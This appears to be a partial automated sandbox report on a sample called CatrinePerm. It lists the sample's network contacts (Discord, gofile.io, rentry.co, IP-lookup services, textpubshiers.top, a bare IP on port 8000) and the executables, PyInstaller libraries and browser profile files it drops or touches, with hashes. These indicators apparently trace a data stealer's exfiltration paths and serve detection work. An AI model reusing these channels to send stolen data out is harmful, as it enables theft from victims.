US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 148.95.21.104.in-addr.arpa udp
US 104.21.95.148:443 rentry.co tcp
US 104.21.95.148:443 rentry.co tcp
US 104.21.95.148:443 rentry.co tcp
US 104.21.95.148:443 rentry.co tcp
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 textpubshiers.top udp
US 172.67.146.76:443 textpubshiers.top tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 76.146.67.172.in-addr.arpa udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store10.gofile.io udp
FR 31.14.70.252:443 store10.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 252.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 201.179.17.96.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 store10.gofile.io udp
FR 31.14.70.252:443 store10.gofile.io tcp
SE 78.69.106.17:8000 tcp
US 8.8.8.8:53 rentry.co udp
US 188.114.96.2:443 rentry.co tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 188.114.96.2:443 rentry.co tcp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 188.114.96.2:443 rentry.co tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 8.8.8.8:53 store1.gofile.io udp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 8.8.8.8:53 227.123.112.45.in-addr.arpa udp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
SE 78.69.106.17:8000 tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 checkip.amazonaws.com udp
SE 78.69.106.17:8000 tcp
IE 34.252.239.71:80 checkip.amazonaws.com tcp
US 172.67.146.76:443 textpubshiers.top tcp
US 8.8.8.8:53 71.239.252.34.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
FR 151.80.29.83:443 api.gofile.io tcp
DE 159.89.102.253:443 geolocation-db.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 8.8.8.8:53 store10.gofile.io udp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
SE 78.69.106.17:8000 tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 edge.msiserver.lan udp
SE 78.69.106.17:8000 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a774512b00820b61a51258335097b2c9
SHA1 38c28d1ea3907a1af6c0443255ab610dd9285095
SHA256 01946a2d65e59b66ebc256470ff4861f32edee90a44e31bf67529add95cafef4
SHA512 ce109be65060a5e7a872707c6c2ccce3aacd577e59c59d6e23e78d03e3d502f2707713fda40a546ed332e41a56ef90297af99590a5ab02f686a58bcbf3a82da1

\??\pipe\LOCAL\crashpad_2192_YDLQTUUBHVNRHMYX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fd7944a4ff1be37517983ffaf5700b11
SHA1 c4287796d78e00969af85b7e16a2d04230961240
SHA256 b54b41e7ce5600bc653aa7c88abb666976872b2d5e2d657bfc1147a0b49e9d74
SHA512 28c58a2ccf39963a8d9f67ea5b93dbccf70b0109b2c8a396a58389cdec9db1205523a95730485bcbc9d533867cbf0e7167ad370fd45740e23656d01d96ee543b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 29ed269ef175af0550f5f675e933a7e5
SHA1 70c3b9af8b130bfd009fce429d9eda4a87d372ff
SHA256 111da147e556cd2eef99cb56d55974dadb2f5b4045550e2a63b0c2dee700b3b8
SHA512 5f6eee4c8486a843029632d8bc9e29654fb5cac23446bfa20f1cabd53f8d466c10dbf35e8a444102a779448e213b2d00eefe3605cbfaaec26d5d750c670887e5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fed54abe92b2e2d6ce2e2ced704f03e1
SHA1 7946f39a194c2ff91de8cc369b6f0f060feba33e
SHA256 e0f3a0ba1d26506c2bf0976da0ba91a23d3f978c34b61464015476a38fd74ee3
SHA512 0a288549e747a6fd7e9fa3ad6be99c762c27a2e8a2506518d7f9188c724f7379be7f3de6e348867de8056df117bd22f58da6f448666340ab4f0313fc53d98fdf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f9c4a76a174bfb14e9e993fa6289e19f
SHA1 b0a4692fd9a911ce4c330a6db02f4811c9ca5204
SHA256 e285a0fccf1be8f01fb8071bd055a6a853baf6396c5747106d8cdca810ffec27
SHA512 0e4b3dbcfdba173f6f0ec13b2f2fdb2b86e32305a0bcc8c6ce309926f71538c4e247b5d240198b0d4842ce2741820761781586c14b0df8f73d3f99d5d9026d49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a79818debcca4bf07d37ce337ca05b7f
SHA1 db45dedd850f925af60d1c8bf0b108c98af05dbd
SHA256 28823ad8bf6e8f315e583b7029e97c32496f0ab6686779a19aebfeb1cea82cec
SHA512 b1e00b4038ee4bc59a7505b2aead6229a224716b5e53ad0b8c3c4fb5ef9107db19ed824d84a8781f17e9fc1d485bf857e8fbd111ec2c5cf6aed67a81b4181434

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 db14b8328f962dc93e24053c0c1a22dd
SHA1 31b105d214422a6c1f854d6164ce59f24dd7081f
SHA256 174e31faeeb4ef44e83fcbbe6950ba214b07f3a4ba9e15142c0f2e4aa03d4dde
SHA512 fcf0beb7ba47980e3d44c6570debc3e39ea77379f674adfd3bb037f3293c37890238598267518398f3fdfdce32053f8753d90da2e8b49216cb212696ddffd521

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0f7c11a8272eadcc5302f9f24dccba37
SHA1 7ee6940e7ff89c41a538ecc783c5fbcf06597e2d
SHA256 a638b5b60339d222c0f388768c9891a0ed893d34b8e6e1aa11719abb0a2fefc0
SHA512 93a4ee4899cde04321c6e6186c6b24220b9d90b28af2e28d34f279dc7016d1d08246cd26aff2a905b17a51a93e3222eb42142d062964999577c6d72cb21aab66

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5b37b28d6b2130e3c7b3b5f7c39a01d3
SHA1 c80a8ff01312c98e669e613bbcb6237a590bfc1d
SHA256 75b42a2f01f5e03a32dfcd8c8c7858f2bf91c8fcaa1bb9521342b424694622d3
SHA512 d85bb43df86a8e5d416f344b6000c848fed41a23d5cadcae5f4dbcb113de8d89f8137ee30f03c06a4143de19d81cc664553c3ab0edb955a14d705759acbea195

C:\Users\Admin\Downloads\CatrinePerm.rar

MD5 be9cedd5e971451825399d5deb204a0d
SHA1 7a05d714638ef1423da7418f71e45126010ce4ab
SHA256 5bde596c5dfbe136b65c0e34c38512a97c9222abd3bcffdefb8032375ec5489d
SHA512 98b93fe0c8a8388a517a5ed71098b54cdf854273f27803da2a139d3ea4ddc218d77a3df75f685db89c4011067f40d0b88fc29dcc5370c97352ca08233ecc1153

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\Default\Extension State\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\Default\Extension State\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\Default\Shared Dictionary\cache\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\GrShaderCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\ShaderCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\ShaderCache\data_1

MD5 a0a05fb0686d1acec29d34e283fd196a
SHA1 9b3f342179c9a4e11efd7ac46b8280a5a5c35963
SHA256 83770e59f56fced3438319cb1ceb7c2005e793589c7b35ddfb089120800e1436
SHA512 205bf28086b41d1a403c4abc968ce46d814b927615ad8e4503e579072057bc4a64ee81ba16781370c8621d2f16f8b1ccc985d2b5263186dd961292fc38270c89

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\ShaderCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

MD5 29c66ded1b50b1c13a228d29d608d95c
SHA1 a242490eaf0b9e0bd71dbdae1f9d444afdeb8116
SHA256 40d15db264c001fff4948e4e8737b4733e88c1e8ac6d2a26b64f8c0eaa6c244b
SHA512 1d6bc7c4aa610439ab3dc995b06749283bda03c2acf41544a2d26efe9814ec7ed7819d55eb550436fd0c2964ab4e6748370fb6e00a954f4fd69a7fea30edfca8

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

MD5 c79315753f8eca50bc7281959725587a
SHA1 88b42c751c8aeeaf76b0b6bd3f266eff7f608b4a
SHA256 accc474815f0020bd89900dfe3cd7f52bd1c49cc6c69ee7470ff9e12e7699ed1
SHA512 03bb58aa39c14f55d39a7e42e39733e3645dfc884dc789d1d52cea74eb0dcfe63c2e282f19e26a9624eec6b57ecf143d0a224b9bf4f3bd45a4a10bec4d8bcac6

memory/5916-668-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5916-669-0x00000000003A0000-0x0000000000EDE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Win (3).exe

MD5 181a5e1c1238407657c399a6195e2a0f
SHA1 ed41ca6ba40433de12c93c5b7df9b3a5c4683017
SHA256 3260ef60eb7691ebc2741e24db06c644c30709c1d93efcac521b47e51c4f2446
SHA512 e0f1ee2de2ca7fb3354affe079318b54846c9afcfba9fe25b4ef17e7dac1b2e28dc3bc481c162cd9576ef58385ef9ebba5c5870f678d37cfb2d924f71d0155b3

C:\Users\Admin\AppData\Roaming\Win (3).exe

MD5 5f8136e9c87c5cd15107a16c93b2410e
SHA1 fd76478c14937669b96185ee1a79c171a9200fd4
SHA256 a53b3cc4736d3277de809b1f29243f80e62111ee445083719f50a217cd531d94
SHA512 131c358ea431f62e697decbf92024137db22ce8a8abec2791288d70eb2158487d5648b89a809a6287755a37f467ab319dc5c0f72f30372e3954b42c32ea06c83

C:\Users\Admin\AppData\Roaming\CatrinePerm.exe

MD5 10605ec186aacb6a4b3dde419cb0b5e5
SHA1 9c41040a4c238dec28c4f47bfb0a28a3cd4bf19d
SHA256 ca5b3ebffc2080fec7d44655069190b892e51e4bc4401c31f64a5a70d46f1ead
SHA512 1d48bbc5c965f098300ce5404269ea5b1694887531b9aa1e953755f631325946e4914405ae3cabfe13d222ddfde4b0368d446b9aad3956f345d6b142d6579a9d

C:\Users\Admin\AppData\Roaming\Win (3).exe

MD5 52da4b0958f918e69e41e524c0b0ebb4
SHA1 74296722e0653c640eec9f555f0c9042b3805799
SHA256 c1ab6c02354188c6e26b4feb5db7f7b6fa36719defa160b053937acd2ba4a745
SHA512 8a9040f4d8ae74151585713318b7235e5a162c5573ddc0389691d5f10d1aa15d8f6a6900235e597c8e291e87bdfc87addc36485eabab7f6755f1af4455d6ca5b

memory/5216-702-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5916-703-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5216-704-0x00000000002E0000-0x0000000000DF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe

MD5 3eda75ddf0da931a8b305573d7508e8c
SHA1 d19618faac5e98152797aa94860725827dae4359
SHA256 c66e4c3be01e7830f7e564ce3139c774eed746c7db619b767e4f1f6e83c52cb9
SHA512 32d05e9c0fe66fee74d67ec20ea33b9332e5a077ef6e8ae26956e00fc839cdd9a840fcd944e33dd8655395588ab74e9768e1ea6210c234a0d60d14e560d544d0

memory/5420-716-0x0000000000B50000-0x0000000000B82000-memory.dmp

memory/5420-717-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 a76d8ae9523bcf5bb2caa451121a0d91
SHA1 4867caa19f280aabdc4f85f6468335d70ad1d996
SHA256 515a528f05f0c708175813df2e149b0960d193bd4dac47a11a7641745c8a063b
SHA512 9dbab2a7c6ce09335a805a319399b95ad818c94153d57818cdf30cd26f825ab4517d15dca8bf4156a0aab5a24a6c06977ddb5f9d27f4be8f601a813dc88b9a57

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

MD5 b3aa2402a8f70a4ff6e85637bf82cef8
SHA1 afbe1b7c1b2eac15839c5cccb3410068d67331d3
SHA256 e0edba7789c5cc1738db332512ef2237bee9baff202306e887cab5e4cc69ada8
SHA512 45489f4645443761b553d4ebe212f1969be652783cb911f68234172eed32a573475c61883d239c4be2bd4246a03a135722c7149dc1e61262eff04ffd38b5a1f6

C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe

MD5 9dfb70a009d9a1696a1a55d17b0321a5
SHA1 0129fcc88ba5c5bb58e8cf0e8860b3b53dbec7a9
SHA256 4eba44c61669a2d7c77b7997846b0d779989d4fff31120caeca595887576c19b
SHA512 0f18f936de567c884d284cd00d9c5953c89865776ef3adc8e7c4de801dda4548c9d1998f222011ca66d567d64c2ad6bfd10050987ec216f9c14844edfb5c6d73

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

MD5 ae2901c87dc043f55ef4119d6582572d
SHA1 c0404a09b9fd17d71da19b6e6d228c765ebd0f63
SHA256 7115c28e5ba30c8a64ad4311bb924ddea53b89d7e3a5979319a27d2f2d1861ed
SHA512 93d81b849fd5366f21e218eb22bf07e09bbaa7b4cca77cc22a01586f8eb5e5f33cf2095272153ca8060c87fe5aed08e1d54ac787d88418a35fe6656c9ec14dcf

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

MD5 5416a44bafb404eae9004b1b770a3225
SHA1 90dfb5e1528069606f26328106d49be22eb2102a
SHA256 3a2cd09a02203573ac71f91a0fc35a0613de2f50151932c53383b4ad19a3dbf0
SHA512 d89f55bf2e12672632b2445d9e03f77257e7cb4f71e24d18bb541ef2529c40b5795d4e0012634b37aa5a85065b4b4a7b8d45ae32329be619a64855bc8eb0d76f

memory/5216-835-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5508-848-0x0000000000F70000-0x0000000000F7A000-memory.dmp

memory/5420-851-0x000000001B8B0000-0x000000001B8C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

MD5 ffe171f8f390c6e6ea900b681d8eb1ec
SHA1 0f8f3c8330bfd0d75ac29de55905886d9bb023f3
SHA256 f4c550467a2a69fd97d98aa85e62a3df99d9776d18deb5b8a2a3b7b5944f95eb
SHA512 ce5f70530e43b90d317d3ba6ed125d26baf82a2fb096b9c45196e2356fc55970bb18e29d5110c004b6375f55466dcc2e7e0305aaa4e46fb5bfc7c44bed9321b2

C:\Users\Admin\AppData\Local\Temp\_MEI52802\python311.dll

MD5 965408ab7d160b37ed1d8819634a6660
SHA1 30611abb15124919dab1096a517aae36c3c95ea7
SHA256 9f0566e72a2a465cb888f64dd0f9db95e84e0a762575dbd31b13c1e6bb63b3b5
SHA512 b3f0e075187b44affeb62526cfef08544072eb507d186df45a9dee9c4355d14a9590c082cca2ae1dee65786ebabec23824d772189ac5ca196b32ded80891bd8f

memory/5508-856-0x00000000031B0000-0x00000000031CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI52802\ucrtbase.dll

MD5 0e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA1 4189f4459c54e69c6d3155a82524bda7549a75a6
SHA256 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512 a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

memory/5508-847-0x00000000744B0000-0x0000000074C60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI52802\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI52802\base_library.zip

MD5 81cd6d012885629791a9e3d9320c444e
SHA1 53268184fdbddf8909c349ed3c6701abe8884c31
SHA256 a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd
SHA512 d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73

C:\Users\Admin\AppData\Local\Temp\_MEI52802\python311.dll

MD5 86e0ad6ba8a9052d1729db2c015daf1c
SHA1 48112072903fff2ec5726cca19cc09e42d6384c7
SHA256 5ecda62f6fd2822355c560412f6d90be46a7f763f0ffeec9854177904632ac2d
SHA512 5d6e32f9ff90a9a584183dad1583aea2327b4aea32184b0ebbec3df41b0b833e6bb3cd40822dd64d1033125f52255812b17e4fa0add38fcda6bab1724dfaa2eb

C:\Users\Admin\AppData\Local\Temp\_MEI52802\_ctypes.pyd

MD5 78df76aa0ff8c17edc60376724d206cd
SHA1 9818bd514d3d0fc1749b2d5ef9e4d72d781b51dd
SHA256 b75560db79ba6fb56c393a4886eedd72e60df1e2f7f870fe2e356d08155f367b
SHA512 6189c1bd56db5b7a9806960bc27742d97d2794acebc32e0a5f634fe0ff863e1775dcf90224504d5e2920a1192a3c1511fb84d41d7a2b69c67d3bdfbab2f968fa

C:\Users\Admin\AppData\Local\Temp\_MEI52802\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI52802\_bz2.pyd

MD5 afaa11704fda2ed686389080b6ffcb11
SHA1 9a9c83546c2e3b3ccf823e944d5fd07d22318a1b
SHA256 ab34b804da5b8e814b2178754d095a4e8aead77eefd3668da188769392cdb5f4
SHA512 de23bb50f1d416cf4716a5d25fe12f4b66e6226bb39e964d0de0fef1724d35b48c681809589c731d3061a97c62b4dc7b9b7dfe2978f196f2d82ccce286be8a2a

C:\Users\Admin\AppData\Local\Temp\_MEI52802\_lzma.pyd

MD5 2ae2464bfcc442083424bc05ed9be7d2
SHA1 f64b100b59713e51d90d2e016b1fe573b6507b5d
SHA256 64ba475a28781dca81180a1b8722a81893704f8d8fac0b022c846fdcf95b15b9
SHA512 6c3acd3dcae733452ad68477417693af64a7d79558e8ec9f0581289903c2412e2f29195b90e396bfdcd765337a6dea9632e4b8d936ac39b1351cd593cb12ce27

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-processthreads-l1-1-0.dll

MD5 8e6eb11588fa9625b68960a46a9b1391
SHA1 ff81f0b3562e846194d330fadf2ab12872be8245
SHA256 ae56e19da96204e7a9cdc0000f96a7ef15086a9fe1f686687cb2d6fbcb037cd6
SHA512 fdb97d1367852403245fc82cb1467942105e4d9db0de7cf13a73658905139bb9ae961044beb0a0870429a1e26fe00fc922fbd823bd43f30f825863cad2c22cea

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 8711e4075fa47880a2cb2bb3013b801a
SHA1 b7ceec13e3d943f26def4c8a93935315c8bb1ac3
SHA256 5bcc3a2d7d651bb1ecc41aa8cd171b5f2b634745e58a8503b702e43aee7cd8c6
SHA512 7370e4acb298b2e690ccd234bd6c95e81a5b870ae225bc0ad8fa80f4473a85e44acc6159502085fe664075afa940cff3de8363304b66a193ac970ced1ba60aae

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 eaf36a1ead954de087c5aa7ac4b4adad
SHA1 9dd6bc47e60ef90794a57c3a84967b3062f73c3c
SHA256 cdba9dc9af63ebd38301a2e7e52391343efeb54349fc2d9b4ee7b6bf4f9cf6eb
SHA512 1af9e60bf5c186ced5877a7fa690d9690b854faa7e6b87b0365521eafb7497fb7370ac023db344a6a92db2544b5bdc6e2744c03b10c286ebbf4f57c6ca3722cf

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-memory-l1-1-0.dll

MD5 c4098d0e952519161f4fd4846ec2b7fc
SHA1 8138ca7eb3015fc617620f05530e4d939cafbd77
SHA256 51b2103e0576b790d5f5fdacb42af5dac357f1fd37afbaaf4c462241c90694b4
SHA512 95aa4c7071bc3e3fa4db80742f587a0b80a452415c816003e894d2582832cf6eac645a26408145245d4deabe71f00eccf6adb38867206bedd5aa0a6413d241f5

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-localization-l1-2-0.dll

MD5 20ddf543a1abe7aee845de1ec1d3aa8e
